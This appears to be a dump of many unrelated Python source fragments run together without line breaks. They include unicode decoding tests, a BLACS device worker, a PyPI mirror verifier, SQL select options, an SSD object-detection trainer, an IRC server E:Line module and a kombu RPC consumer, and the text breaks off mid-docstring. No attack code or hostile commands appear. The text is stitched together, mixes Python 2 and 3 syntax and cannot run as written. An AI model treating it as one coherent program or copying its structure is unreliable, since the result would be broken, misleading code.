# # https://mail.python.org/pipermail/python-dev/2011-September/113590.html # O.o def test_garbage_is_garbage(): raises(UnicodeDecodeError, lambda s: s.decode('utf8'), GARBAGE) def test_backslashreplace_error_strategy_works_when_decoding(): actual = GARBAGE.decode('utf8', 'backslashreplace') assert actual == r"a\xef\xf9" def test_backslashreplace_error_strategy_works_when_encoding(): actual = 'comet: \u2604'.encode('ascii', 'backslashreplace') assert actual == br"comet: \u2604" #-*-coding:utf8;-*- #qpy:console m = float(input('Digite o valor da medida: ')) cm = m * 100 mm = m * 1000 print('\n') print(' Metro: {} \n Centímetro: {} \n Milímetro: {}'.format(m, cm, mm)) dummy_device/blacs_workers.py """This is where BLACS really connects to the hardware. Everything elso is just sending it here. """ from blacs.tab_base_classes import Worker class DummyDeviceWorker(Worker): """The class behind the Output Worker. It inherits from Worker. Attributes: connection: Not sure here. shot_file: Not sure here. """ shot_file = None timeout = 10 def init(self): """Initialize the Worker. Initializes the IP socket and resets everything properly. Do NOT rename it to __init__ . There is something specific about Blacs that remains a bit mystical to me. """ # Each shot, we will remember the shot file for the duration of that shot self.timeout = 10 self.shot_file = None def __repr__(self): """Nice printing format for the YunTempWorker. Returns: ret_str: a string that is some key information about the worker. """ ret_str = "" return ret_str def transition_to_buffered(self, device_name, h5_file, initial_values, fresh): """ Required - Read commands from the shot file and send them to the device. Not sure about the right description here. Args: device_name: Not sure here. h5_file: Not sure here. initial_values: Not sure here. fresh: Not sure here. Returns: Empty dict. """ # pylint: disable=unused-argument, R0201 # # This is expected by BLACS, we should return the final values that numerical # channels have from th shot - for us we have no channels so this is an empty # dictionary return {} def transition_to_manual(self): """ Required - Not sure what it does. Not sure about the right description here. Returns: Empty dict. """ # pylint: disable= R0201 # This is expected by BLACS to indicate success: return True def abort_buffered(self): """ Called when BLACS closes. Called when a shot is aborted. We may or may not want to run transition_to_manual in this case. If not, then this method should do whatever else it needs to, and then return True. It should make sure to clear any state were storing about this shot (e.g. it should set self.shot_file = None) """ return self.transition_to_manual() def abort_transition_to_buffered(self): """ This is called if transition_to_buffered fails with an exception or returns False. Returns: True, which indicates success. """ # Forget the shot file: self.shot_file = None return True # Indicates success def program_manual(self, front_panel_values): """Performans manual updates from BLACS front panel. Attributes: front_panel_values: Not where they come from. Returns: dict: Which are the values the Arduino gives us back after we programmed it. """ # pylint: disable= R0201, W0613 # Update values from front panel return {} setup.py1-10 #!/usr/bin/env python from setuptools import setup, find_packages setup( name = "Main Array Generator", description='printf without printf, but with main... 
as an array!', version = "0.1", author='', author_email='', packages = find_packages(), install_requires = ['pexpect>=0.1'], scripts=['gen.py'] )src/bandersnatch/verify.py import argparse import asyncio import concurrent.futures import json import logging import os import shutil from argparse import Namespace from asyncio.queues import Queue from configparser import ConfigParser from pathlib import Path from sys import stderr from typing import List, Optional, Set from urllib.parse import urlparse from .filter import LoadedFilters from .master import Master from .storage import storage_backend_plugins from .utils import convert_url_to_path, hash, recursive_find_files, unlink_parent_dir logger = logging.getLogger(__name__) async def get_latest_json( master: Master, json_path: Path, config: ConfigParser, executor: Optional[concurrent.futures.ThreadPoolExecutor] = None, delete_removed_packages: bool = False, ) -> None: url_parts = urlparse(config.get("mirror", "master")) url = f"{url_parts.scheme}://{url_parts.netloc}/pypi/{json_path.name}/json" logger.debug(f"Updating {json_path.name} json from {url}") new_json_path = json_path.parent / f"{json_path.name}.new" await master.url_fetch(url, new_json_path, executor) if new_json_path.exists(): shutil.move(str(new_json_path), json_path) else: logger.error( f"{str(new_json_path)} does not exist - Did not get new JSON metadata" ) if delete_removed_packages and json_path.exists(): logger.debug(f"Unlinking {json_path} - assuming it does not exist upstream") json_path.unlink() async def delete_unowned_files( mirror_base: Path, executor: concurrent.futures.ThreadPoolExecutor, all_package_files: List[Path], dry_run: bool, ) -> int: loop = asyncio.get_event_loop() packages_path = mirror_base / "web" / "packages" all_fs_files: Set[Path] = set() await loop.run_in_executor( executor, recursive_find_files, all_fs_files, packages_path ) all_package_files_set = set(all_package_files) unowned_files = all_fs_files - all_package_files_set logger.info( f"We have {len(all_package_files_set)} files. 
" + f"{len(unowned_files)} unowned files" ) if not unowned_files: logger.info(f"{mirror_base} has no files to delete") return 0 if dry_run: print("[DRY RUN] Unowned file list:", file=stderr) for f in sorted(unowned_files): print(f) else: del_coros = [] for file_path in unowned_files: del_coros.append( loop.run_in_executor(executor, unlink_parent_dir, file_path) ) await asyncio.gather(*del_coros) return 0 async def verify( master: Master, config: ConfigParser, json_file: str, mirror_base_path: Path, all_package_files: List[Path], args: argparse.Namespace, executor: Optional[concurrent.futures.ThreadPoolExecutor] = None, releases_key: str = "releases", ) -> None: json_base = mirror_base_path / "web" / "json" json_full_path = json_base / json_file loop = asyncio.get_event_loop() logger.info(f"Parsing {json_file}") if args.json_update: if not args.dry_run: await get_latest_json(master, json_full_path, config, executor, args.delete) else: logger.info(f"[DRY RUN] Would of grabbed latest json for {json_file}") if not json_full_path.exists(): logger.debug(f"Not trying to sync package as {json_full_path} does not exist") return try: with json_full_path.open("r") as jfp: pkg = json.load(jfp) except json.decoder.JSONDecodeError as jde: logger.error(f"Failed to load {json_full_path}: {jde} - skipping ...") return # apply releases filter plugins like class Package for plugin in LoadedFilters().filter_release_plugins() or []: plugin.filter(pkg["info"]) for release_version in pkg[releases_key]: for jpkg in pkg[releases_key][release_version]: pkg_file = mirror_base_path / "web" / convert_url_to_path(jpkg["url"]) if not pkg_file.exists(): if args.dry_run: logger.info(f"{jpkg['url']} would be fetched") all_package_files.append(pkg_file) continue else: await master.url_fetch(jpkg["url"], pkg_file, executor) calc_sha256 = await loop.run_in_executor(executor, hash, str(pkg_file)) if calc_sha256 != jpkg["digests"]["sha256"]: if not args.dry_run: await loop.run_in_executor(None, pkg_file.unlink) await master.url_fetch(jpkg["url"], pkg_file, executor) else: logger.info( f"[DRY RUN] {jpkg['info']['name']} has a sha256 mismatch." 
) all_package_files.append(pkg_file) logger.info(f"Finished validating {json_file}") async def verify_producer( master: Master, config: ConfigParser, all_package_files: List[Path], mirror_base_path: Path, json_files: List[str], args: argparse.Namespace, executor: Optional[concurrent.futures.ThreadPoolExecutor] = None, ) -> None: queue: asyncio.Queue = asyncio.Queue() for jf in json_files: await queue.put(jf) async def consume(q: Queue) -> None: while not q.empty(): json_file = await q.get() await verify( master, config, json_file, mirror_base_path, all_package_files, args, executor, ) await asyncio.gather( *[consume(queue)] * config.getint("mirror", "verifiers", fallback=3) ) async def metadata_verify(config: ConfigParser, args: Namespace) -> int: """Crawl all saved JSON metadata or online to check we have all packages if delete - generate a diff of unowned files""" all_package_files: List[Path] = [] loop = asyncio.get_event_loop() storage_backend = next( iter(storage_backend_plugins(config=config, clear_cache=True)) ) mirror_base_path = storage_backend.PATH_BACKEND(config.get("mirror", "directory")) json_base = mirror_base_path / "web" / "json" workers = args.workers or config.getint("mirror", "workers") executor = concurrent.futures.ThreadPoolExecutor(max_workers=workers) logger.info(f"Starting verify for {mirror_base_path} with {workers} workers") try: json_files = await loop.run_in_executor(executor, os.listdir, json_base) except FileExistsError as fee: logger.error(f"Metadata base dir {json_base} does not exist: {fee}") return 2 if not json_files: logger.error("No JSON metadata files found. Can not verify") return 3 logger.debug(f"Found {len(json_files)} objects in {json_base}") logger.debug(f"Using a {workers} thread ThreadPoolExecutor") async with Master( config.get("mirror", "master"), config.getfloat("mirror", "timeout"), config.getfloat("mirror", "global-timeout", fallback=None), ) as master: await verify_producer( master, config, all_package_files, mirror_base_path, json_files, args, executor, ) if not args.delete: return 0 return await delete_unowned_files( mirror_base_path, executor, all_package_files, args.dry_run ) from .pydatastream import Datastream, DatastreamException from ._version import * from sqlpuzzle._common import Object from sqlpuzzle._queries.options import Options __all__ = () class SelectOptions(Options): _definition_of_options = { 'sql_cache': { 'off': '', 'cache': 'SQL_CACHE', 'no_cache': 'SQL_NO_CACHE' }, 'duplicated': { 'off': '', 'all': 'ALL', 'distinct': 'DISTINCT', 'distinctrow': 'DISTINCTROW', }, 'sql_small_result': { 'off': '', 'on': 'SQL_SMALL_RESULT', }, 'sql_big_result': { 'off': '', 'on': 'SQL_BIG_RESULT', }, 'sql_buffer_result': { 'off': '', 'on': 'SQL_BUFFER_RESULT', }, 'sql_calc_found_rows': { 'off': '', 'on': 'SQL_CALC_FOUND_ROWS', }, 'straight_join': { 'off': '', 'on': 'STRAIGHT_JOIN', }, 'high_priority': { 'off': '', 'on': 'HIGH_PRIORITY', }, } def sql_cache(self, allow=True): self._options['sql_cache'] = 'cache' if allow else 'off' def sql_no_cache(self, allow=True): self._options['sql_cache'] = 'no_cache' if allow else 'off' def all(self, allow=True): self._options['duplicated'] = 'all' if allow else 'off' def distinct(self, allow=True): self._options['duplicated'] = 'distinct' if allow else 'off' def distinctrow(self, allow=True): self._options['duplicated'] = 'distinctrow' if allow else 'off' def sql_small_result(self, allow=True): self._options['sql_small_result'] = 'on' if allow else 'off' def sql_big_result(self, allow=True): 
self._options['sql_big_result'] = 'on' if allow else 'off' def sql_buffer_result(self, allow=True): self._options['sql_buffer_result'] = 'on' if allow else 'off' def sql_calc_found_rows(self, allow=True): self._options['sql_calc_found_rows'] = 'on' if allow else 'off' def straight_join(self, allow=True): self._options['straight_join'] = 'on' if allow else 'off' def high_priority(self, allow=True): self._options['high_priority'] = 'on' if allow else 'off' class SelectForUpdate(Object): def __init__(self): super().__init__() self._for_update = False def __str__(self): if self._for_update: return 'FOR UPDATE' return '' def __eq__(self, other): return ( type(self) == type(other) and self._for_update == other._for_update ) @property def is_set(self): return self._for_update def has(self, value): return hasattr(self, value) def for_update(self, allow=True): self._for_update = bool(allow) stacksites/extensions.py # -*- coding: utf-8 -*- from flask.ext.sqlalchemy import SQLAlchemy db = SQLAlchemy() from flask.ext.bcrypt import Bcrypt bcrypt = Bcrypt() from flask.ext.login import LoginManager login_manager = LoginManager() from flask.ext.migrate import Migrate migrate = Migrate() from flask.ext.mail import Mail mail = Mail() from flask_sslify import SSLify from flask_wtf.csrf import CsrfProtect csrf = CsrfProtect() # Flask settings DEBUG = False # Flask-restplus settings RESTPLUS_MASK_SWAGGER = False # Application settings # API metadata API_TITLE = 'MAX Human Pose Estimator' API_DESC = 'Detect humans in an image and estimate the pose for each person.' API_VERSION = '1.1.0' # default model MODEL_NAME = 'MAX Human Pose Estimator' DEFAULT_MODEL_PATH = 'assets/human-pose-estimator-tensorflow.pb' MODEL_LICENSE = 'Apache License 2.0' DEFAULT_IMAGE_SIZE_STR = '432x368' DEFAULT_IMAGE_SIZE = (432,368) # Recommends: 432x368 or 656x368 or 1312x736 DEFAULT_BATCH_SIZE = 2 DEFAULT_PREPROCESS_THREADS = 2 includoo/graph/video_together.py import requests def create_room(video_url=r"https://www.youtube.com/watch?v=3ZRE6uVMDAo"): request_url = r"https://w2g.tv/rooms/create.json" api_key = "" r = requests.post(request_url, data={"w2g_api_key": api_key, "share": video_url}) if r.ok: room_key = r.json()["streamkey"] response_url = f"https://w2g.tv/rooms/{room_key}" else: response_url = "https://w2g.tv/rooms/" return response_url #print(create_room()) almartin82/bayeslitesrc/backends/cgpm_analyze/parse.py # -*- coding: utf-8 -*- # Copyright (c) 2010-2016, MIT Probabilistic Computing Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
from collections import namedtuple from bayeslite.exception import BQLParseError from bayeslite.util import casefold import grammar ''' grep -o 'K_[A-Z][A-Z0-9_]*' < grammar.y | sort -u | awk ' { sub("^K_", "", $1); printf(" '\''%s'\'': grammar.K_%s,\n", tolower($1), $1); }' ''' KEYWORDS = { 'clustering': grammar.K_CLUSTERING, 'concentration': grammar.K_CONCENTRATION, 'hyperparameters': grammar.K_HYPERPARAMETERS, 'loom': grammar.K_LOOM, 'optimized': grammar.K_OPTIMIZED, 'quiet': grammar.K_QUIET, 'row': grammar.K_ROW, 'rows': grammar.K_ROWS, 'skip': grammar.K_SKIP, 'subproblem': grammar.K_SUBPROBLEM, 'subproblems': grammar.K_SUBPROBLEMS, 'variable': grammar.K_VARIABLE, 'variables': grammar.K_VARIABLES, } PUNCTUATION = { ',': grammar.T_COMMA, '(': grammar.T_LROUND, ')': grammar.T_RROUND, ';': grammar.T_SEMI, } def parse(tokens): semantics = CGpmAnalyzeSemantics() parser = grammar.Parser(semantics) for token in tokenize(tokens): semantics.context.append(token) if len(semantics.context) > 10: semantics.context.pop(0) parser.feed(token) if semantics.errors: raise BQLParseError(semantics.errors) if semantics.failed: raise BQLParseError(['parse failed mysteriously']) assert semantics.phrases is not None return semantics.phrases def tokenize(tokens): for token in tokens: if isinstance(token, str): if casefold(token) in KEYWORDS: yield KEYWORDS[casefold(token)], token elif token in PUNCTUATION: yield PUNCTUATION[token], token else: # XXX check for alphanumeric/_ yield grammar.L_NAME, token elif isinstance(token, (int, float)): yield grammar.L_NUMBER, token else: raise IOError('Invalid token: %r' % (token,)) yield 0, '' # EOF class CGpmAnalyzeSemantics(object): def __init__(self): self.context = [] self.errors = [] self.failed = False self.phrases = None def accept(self): pass def parse_failed(self): self.failed = True def syntax_error(self, (token, text)): if token == -1: # error self.errors.append('Bad token: %r' % (text,)) else: self.errors.append("Syntax error near [%s] after [%s]" % ( text, ' '.join([str(t) for (_t, t) in self.context[:-1]]))) def p_analysis_start(self, ps): self.phrases = ps def p_phrases_one(self, p): return [p] if p else [] def p_phrases_many(self, ps, p): if p: ps.append(p) return ps def p_phrase_none(self,): return None def p_phrase_variables(self, cols): return Variables(cols) def p_phrase_skip(self, cols): return Skip(cols) def p_phrase_rows(self, rows): return Rows(rows) def p_phrase_loom(self): return Optimized('loom') def p_phrase_optimized(self): return Optimized('lovecat') def p_phrase_quiet(self): return Quiet(True) def p_phrase_subproblems(self, s): return Subproblem(s) def p_subproblems_list_one(self, s): return [s] def p_subproblems_list_many(self, s): return s def p_subproblems_one(self, s): return [s] def p_subproblems_many(self, ss, s): ss.append(s); return ss def p_subproblem_variable_hyperparameters(self): return 'variable_hyperparameters' def p_subproblem_variable_clustering(self): return 'variable_clustering' def p_subproblem_variable_clustering_concentration(self): return 'variable_clustering_concentration' def p_subproblem_row_clustering(self): return 'row_clustering' def p_subproblem_row_clustering_concentration(self): return 'row_clustering_concentration' def p_column_list_one(self, col): return [col] def p_column_list_many(self, cols, col): cols.append(col); return cols def p_column_name_n(self, name): return name def p_row_list_one(self, row): return [row] def p_row_list_many(self, rows, row): rows.append(row); return rows def p_row_index_n(self, 
n): return n Optimized = namedtuple('Optimized', ['backend']) Quiet = namedtuple('Quiet', ['flag']) Rows = namedtuple('Rows', ['rows']) Skip = namedtuple('Skip', ['vars']) Subproblem = namedtuple('Subproblem', ['subproblems']) Variables = namedtuple('Variables', ['vars']) whr0724/SSD-Pytorch # -*- coding: utf-8 -*- # @Author : LG import torch from torch.optim.lr_scheduler import MultiStepLR from Data import Our_Dataloader from .structs import multiboxloss from Utils.visdom_op import visdom_line, setup_visdom, visdom_bar from torch import nn from torch.nn import DataParallel import os __all__ = ['Trainer'] class Trainer(object): """ 模型训练器,不指定参数时,均默认使用Configs中配置的参数 *** 推荐使用Configs文件管理参数, 不推荐在函数中进行参数指定, 只是为了扩展 *** *** 默认使用 SGD 优化器, 如需使用其他优化器, 继承该类,对build_optimizer方法进行重写即可*** 模型在训练时,会使用DataParallel进行包装,以便于在多GPU上进行训练 本训练器只支持GPU训练,单机单卡与单机单卡均可,但不支持cpu,不支持多机多卡(别问为啥不支持多机多卡.穷!!!) eg: trainer = Trainer(cfg) # 实例化训练器 trainer(net,train_dataset) # 在train_dataset数据集上训练模型net """ def __init__(self, cfg, max_iter=None, batch_size=None, train_devices=None, model_save_step=None, model_save_root=None, vis = None, vis_step=None): """ 训练器初始化 值为None的参数项不指定时为默认,已在配置文件中设置. 如需更改参数建议在Configs配置文件中进行更改 不建议直接指定参数,只留做扩展用. :param cfg: 配置 :param max_iter: 最大训练轮数 :param batch_size: 批次数, :param train_devices: 训练设备,列表,eg:[0,1],使用0,1俩个GPU,这里0,1为gpu编号,可用nvidia-smi查看.,不指定时为默认,已在配置文件中设置 :param vis: visdom.Visdom(),用于训练过程可视化.绘制损失曲线已经学习率 :param model_save_step: 模型保存步长 :param vis_step: visdom可视化步长 """ self.cfg = cfg self.iterations = self.cfg.TRAIN.MAX_ITER if max_iter: self.iterations = max_iter self.batch_size = cfg.TRAIN.BATCH_SIZE if batch_size: self.batch_size = batch_size self.train_devices = cfg.DEVICE.TRAIN_DEVICES if train_devices: self.train_devices = train_devices self.model_save_root = cfg.FILE.MODEL_SAVE_ROOT if model_save_root: self.model_save_root = model_save_root if not os.path.exists(self.model_save_root): os.mkdir(self.model_save_root) self.model_save_step = self.cfg.STEP.MODEL_SAVE_STEP if model_save_step: self.model_save_step = model_save_step self.vis = setup_visdom() if vis: self.vis = vis self.vis_step = self.cfg.STEP.VIS_STEP if vis_step: self.vis_step = vis_step self.model = None self.loss_func = None self.optimizer = None self.scheduler = None def __call__(self, model, dataset): """ 训练器使用, 传入 模型 与数据集. :param model: :param dataset: :return: """ if not isinstance(model, nn.DataParallel): # raise TypeError('请用 DataParallel 包装模型. 
eg: model = DataParallel(model, device_ids=[0,1,2]),使用device_ids指定需要使用的gpu') model = DataParallel(model, device_ids=self.train_devices) self.model = model data_loader = Our_Dataloader(dataset, batch_size=self.batch_size, shuffle=True) print(' Max_iter = {}, Batch_size = {}'.format(self.iterations, self.batch_size)) print(' Model will train on cuda:{}'.format(self.train_devices)) num_gpu_use = len(self.train_devices) if (self.batch_size % num_gpu_use) != 0: raise ValueError( 'You use {} gpu to train , but set batch_size={}'.format(num_gpu_use, data_loader.batch_size)) self.set_lossfunc() self.set_optimizer() self.set_scheduler() print("Set optimizer : {}".format(self.optimizer)) print("Set scheduler : {}".format(self.scheduler)) print("Set lossfunc : {}".format(self.loss_func)) print(' Start Train......') print(' -------' * 20) for iteration, (images, boxes, labels, image_names) in enumerate(data_loader): iteration+=1 boxes, labels = boxes.to('cuda'), labels.to('cuda') cls_logits, bbox_preds = self.model(images) reg_loss, cls_loss = self.loss_func(cls_logits, bbox_preds, labels, boxes) reg_loss = reg_loss.mean() cls_loss = cls_loss.mean() loss = reg_loss + cls_loss self.optimizer.zero_grad() loss.backward() self.optimizer.step() self.scheduler.step() lr = self.optimizer.param_groups[0]['lr'] if iteration % 10 == 0: print('Iter : {}/{} | Lr : {} | Loss : {:.4f} | cls_loss : {:.4f} | reg_loss : {:.4f}'.format(iteration, self.iterations, lr, loss.item(), cls_loss.item(), reg_loss.item())) if self.vis and iteration % self.vis_step == 0: visdom_line(self.vis, y=[loss], x=iteration, win_name='loss') visdom_line(self.vis, y=[reg_loss], x=iteration, win_name='reg_loss') visdom_line(self.vis, y=[cls_loss], x=iteration, win_name='cls_loss') visdom_line(self.vis, y=[lr], x=iteration, win_name='lr') if iteration % self.model_save_step == 0: torch.save(model.module.state_dict(), '{}/model_{}.pkl'.format(self.model_save_root, iteration)) return True def set_optimizer(self, lr=None, momentum=None, weight_decay=None): """ 配置优化器 :param lr: 初始学习率, 默认0.001 :param momentum: 动量, 默认 0.9 :param weight_decay: 权重衰减,L2, 默认 5e-4 :return: """ if not lr: lr= self.cfg.OPTIM.LR if not momentum: momentum = self.cfg.OPTIM.MOMENTUM if not weight_decay: weight_decay = self.cfg.OPTIM.WEIGHT_DECAY self.optimizer = torch.optim.SGD(self.model.parameters(), lr=lr, momentum=momentum, weight_decay=weight_decay) def set_lossfunc(self, neg_pos_ratio=None): """ 配置损失函数 :param neg_pos_ratio: 负正例 比例,默认3, 负例数量是正例的三倍 :return: """ if not neg_pos_ratio: neg_pos_ratio = self.cfg.TRAIN.NEG_POS_RATIO self.loss_func = multiboxloss(neg_pos_ratio=neg_pos_ratio) # print(' Trainer set loss_func : {}, neg_pos_ratio = {}'.format('multiboxloss', neg_pos_ratio)) def set_scheduler(self, lr_steps=None, gamma=None): """ 配置学习率衰减策略 :param lr_steps: 默认 [80000, 10000],当训练到这些轮次时,学习率*gamma :param gamma: 默认 0.1,学习率下降10倍 :return: """ if not lr_steps: lr_steps = self.cfg.OPTIM.SCHEDULER.LR_STEPS if not gamma: gamma = self.cfg.OPTIM.SCHEDULER.GAMMA self.scheduler = MultiStepLR(optimizer=self.optimizer, milestones=lr_steps, gamma=gamma) # print(' Trainer set scheduler : {}, lr_steps={}, gamma={}'.format('MultiStepLR', lr_steps, gamma)) tests/test_components.py """ProtoTorch components test suite.""" import prototorch as pt import torch def test_labcomps_zeros_init(): protos = torch.zeros(3, 2) c = pt.components.LabeledComponents( distribution=[1, 1, 1], initializer=pt.components.Zeros(2), ) assert (c.components == protos).any() == True def test_labcomps_warmstart(): 
protos = torch.randn(3, 2) plabels = torch.tensor([1, 2, 3]) c = pt.components.LabeledComponents( distribution=[1, 1, 1], initializer=None, initialized_components=[protos, plabels], ) assert (c.components == protos).any() == True assert (c.component_labels == plabels).any() == True import logging from gongish.router import RouterMixin from gongish.configuration import ConfigurationMixin logger = logging.getLogger("gongish") class Application(RouterMixin, ConfigurationMixin): #: Application logger based on python builtin logging module __logger__ = logger def __init__(self): ConfigurationMixin.__init__(self) RouterMixin.__init__(self) def setup(self): # pragma: nocover raise NotImplementedError def shutdown(self): # pragma: nocover raise NotImplementedError lib_apk_shrink/model/UselessLayoutConfig.py #! /usr/bin/env python # -*- coding: utf-8 -*- # class UselessLayoutConfig(object): src_dir = [] layout_dir = [] xml_dir = [] white_list = [] def __init__(self, dict=[]): if 'src_dir' in dict: self.src_dir = dict['src_dir'] if 'layout_dir' in dict: self.layout_dir = dict['layout_dir'] if 'xml_dir' in dict: self.xml_dir = dict['xml_dir'] if 'white_list' in dict: self.white_list = dict['white_list'] def __repr__(self): return 'UselessLayoutConfig' bioexcel/biobb_analysis1-10 from biobb_common.tools import test_fixtures as fx from biobb_analysis.ambertools.cpptraj_mask import cpptraj_mask class TestCpptrajMask(): def setUp(self): fx.test_setup(self,'cpptraj_mask') def tearDown(self): fx.test_teardown(self) pass def test_mask(self): cpptraj_mask(properties=self.properties, **self.paths) assert fx.not_empty(self.paths['output_cpptraj_path']) assert fx.equal(self.paths['output_cpptraj_path'], self.paths['ref_output_cpptraj_path']) import os import json from C2char import getListdir from aip import AipNlp def App(): APP_ID = '11169559' API_KEY = '' SECRET_KEY = '' return AipNlp(APP_ID, API_KEY, SECRET_KEY) def getText(txt): f=open(txt,'r',encoding='UTF-8') return f.read().encode('GBK','ignore').decode('GBK') def getStopwords(txt): stopwords=[] with open(txt,'r',encoding='UTF-8') as f: for word in f.read().splitlines(): stopwords.append(word) return stopwords def writeJSON(text, i): with open('../News_ws_C/News_'+str(i)+'.json', 'w',encoding='UTF-8') as f: json.dump(text,f,ensure_ascii=False) def delStopword(items,stopwords): newitems=[] for item in items: if item['item'] in stopwords: continue newitems.append(item) return newitems def main(): stopwords=getStopwords('./stop_words_zh.txt') d='./News_C/' os.chdir(d) fa=getListdir(os) client = App() e=[] for i in range(0,len(fa)): text = str(getText(fa[i])) r=client.lexer(text) if 'error_code' in r.keys(): e.append(fa[i]) continue print(fa[i]) items={'items':delStopword(r['items'],stopwords)} writeJSON(items,i+1) print('error: ',end=' ') print(e) if __name__=='__main__': main() swelanauguste/crown_land_1 from django.urls import path from . 
import views app_name = "employees" urlpatterns = [ path( "update/", views.EmployeeUpdateView.as_view(), name="employee-update" ), path( "detail/", views.EmployeeDetailView.as_view(), name="employee-detail" ), ] import os import configparser PATH_TO_CONFIG_FILE = os.path.join(os.path.dirname(__file__), "../../configs/autodp.cfg") # Check if file exists and readable if not (os.path.isfile(PATH_TO_CONFIG_FILE) and os.access(PATH_TO_CONFIG_FILE, os.R_OK)): raise IOError("Either file %s is missing or not readable" % PATH_TO_CONFIG_FILE) # Create a configuration parser to parse all necessary parameters config_parser = configparser.RawConfigParser() config_parser.read(PATH_TO_CONFIG_FILE) from kombu import Connection, Exchange, Producer, Queue, Consumer conn = Connection("amqp://guest:guest@localhost:5672") exchange = Exchange("rpc", type="direct") request_queue = Queue(name="rpc", exchange=exchange, routing_key="request") request_queue.maybe_bind(conn) request_queue.declare() def process_message(body,message): print("Request: %s" %body) message.ack() #send reply to client producer = Producer(channel=conn, routing_key=message.properties['reply_to']) producer.publish("result") with Consumer(conn, request_queue, callbacks=[process_message]): conn.drain_events() def read_multipletlist(filename): multipletlist=[] with open(filename, 'r') as linefile: newmultiplet={'name':'','wave':[],'linename':[]} for read in linefile: #cut off all comments on line read=read.split('#')[0] #strip whitespaces read=read.strip() #skip empty lines or comment lines if not(len(read) == 0): readsplit = read.split('&') if len(readsplit) == 1: if len(newmultiplet['wave']) > 0: multipletlist.append(newmultiplet) newmultiplet={'name':readsplit[0],'wave':[],'linename':[]} else: #add wavelength and linename to newmultiplet try: wave=float(readsplit[0]) if wave <= 0: raise ValueError newmultiplet['wave'].append(wave) newmultiplet['linename'].append(readsplit[1].strip()) except ValueError: print readsplit[0]+' is not a valid number in line '+read else: #at end of file (i.e. 
end of for loop) add last multiplet (if not empty) if len(newmultiplet['wave']) > 0: multipletlist.append(newmultiplet) return multipletlist txircd/modules/core/bans_eline.py from twisted.plugin import IPlugin from twisted.words.protocols import irc from txircd.module_interface import Command, ICommand, IModuleData, ModuleData from txircd.modules.xlinebase import XLineBase from txircd.utils import durationToSeconds, ircLower, now from zope.interface import implements from fnmatch import fnmatchcase class ELine(ModuleData, XLineBase): implements(IPlugin, IModuleData) name = "ELine" core = True lineType = "E" def actions(self): return [ ("verifyxlinematch", 10, self.checkException), ("commandpermission-ELINE", 10, self.restrictToOper), ("statsruntype-elines", 10, self.generateInfo), ("burst", 10, self.burstLines) ] def userCommands(self): return [ ("ELINE", 1, UserELine(self)) ] def serverCommands(self): return [ ("ADDLINE", 1, ServerAddELine(self)), ("DELLINE", 1, ServerDelELine(self)) ] def load(self): self.initializeLineStorage() def checkUserMatch(self, user, mask, data): exceptMask = ircLower(mask) userMask = ircLower("{}@{}".format(user.ident, user.host())) if fnmatchcase(userMask, exceptMask): return True userMask = ircLower("{}@{}".format(user.ident, user.realHost)) if fnmatchcase(userMask, exceptMask): return True userMask = ircLower("{}@{}".format(user.ident, user.ip)) if fnmatchcase(userMask, exceptMask): return True return False def checkException(self, lineType, user, mask, data): if lineType == "E": return None if self.matchUser(user) is not None and not self.ircd.runActionUntilFalse("xlinetypeallowsexempt", lineType): return False return None def restrictToOper(self, user, data): if not self.ircd.runActionUntilValue("userhasoperpermission", user, "command-eline", users=[user]): user.sendMessage(irc.ERR_NOPRIVILEGES, "Permission denied - You do not have the correct operator privileges") return False return None class UserELine(Command): implements(ICommand) def __init__(self, module): self.module = module def parseParams(self, user, params, prefix, tags): if len(params) < 1 or len(params) == 2: user.sendSingleError("ELineParams", irc.ERR_NEEDMOREPARAMS, "ELINE", "Not enough parameters") return None banmask = params[0] if banmask in self.module.ircd.userNicks: targetUser = self.module.ircd.users[self.module.ircd.userNicks[banmask]] banmask = "{}@{}".format(targetUser.ident, targetUser.realHost) else: if "@" not in banmask: banmask = "*@{}".format(banmask) if len(params) == 1: return { "mask": banmask } return { "mask": banmask, "duration": durationToSeconds(params[1]), "reason": " ".join(params[2:]) } def execute(self, user, data): banmask = data["mask"] if "reason" in data: if not self.module.addLine(banmask, now(), data["duration"], user.hostmask(), data["reason"]): user.sendMessage("NOTICE", "*** E:Line for {} is already set.".format(banmask)) return True if data["duration"] > 0: user.sendMessage("NOTICE", "*** Timed e:line for {} has been set, to expire in {} seconds.".format(banmask, data["duration"])) else: user.sendMessage("NOTICE", "*** Permanent e:line for {} has been set.".format(banmask)) return True if not self.module.delLine(banmask): user.sendMessage("NOTICE", "*** E:Line for {} doesn't exist.".format(banmask)) return True user.sendMessage("NOTICE", "*** E:Line for {} has been removed.".format(banmask)) return True class ServerAddELine(Command): implements(ICommand) def __init__(self, module): self.module = module def parseParams(self, server, params, prefix, 
tags): return self.module.handleServerAddParams(server, params, prefix, tags) def execute(self, server, data): return self.module.executeServerAddCommand(server, data) class ServerDelELine(Command): implements(ICommand) def __init__(self, module): self.module = module def parseParams(self, server, params, prefix, tags): return self.module.handleServerDelParams(server, params, prefix, tags) def execute(self, server, data): return self.module.executeServerDelCommand(server, data) elineModule = ELine()kyleniemeyer/altamisa # -*- coding: utf-8 -*- """ Module for helper functions of global use. """ __author__ = " <>" def is_ontology_term_ref(v): """Duck typing check for objects of class `models.OntologyTermRef`""" return hasattr(v, "name") and hasattr(v, "ontology_name") and hasattr(v, "accession") cfgov/cfgov/tests/test_test.py1-10 from __future__ import print_function import six import sys from six import StringIO from unittest import TestCase, TestSuite, defaultTestLoader from cfgov.test import StdoutCapturingTestRunner, redirect_stdout if six.PY2: class TestRedirectStdout(TestCase): def test_redirect_to_string_io(self): stdout = sys.stdout unstdout = StringIO() with redirect_stdout(unstdout): self.assertIs(sys.stdout, unstdout) print('Hello, world!', file=sys.stdout) self.assertIs(sys.stdout, stdout) test_str = unstdout.getvalue().strip() self.assertEqual(test_str, 'Hello, world!') def test_raises_exception(self): unstdout = StringIO() with self.assertRaises(ValueError): with redirect_stdout(unstdout): raise ValueError('Test exception handling') class StderrSuppressingStdoutCapturingTestRunner(StdoutCapturingTestRunner): """Modified StdoutCapturingTestRunner for use in testing. Normally when tests are run, they write output to stderr indicating how many tests are run, and whether they succeed, like this: . ---------------------------------------------------------------------- Ran 1 test in 0.000s OK For the purposes of testing our test runner, we want to suppress this output, so that we don't get test case output within our test case output. We do this by capturing 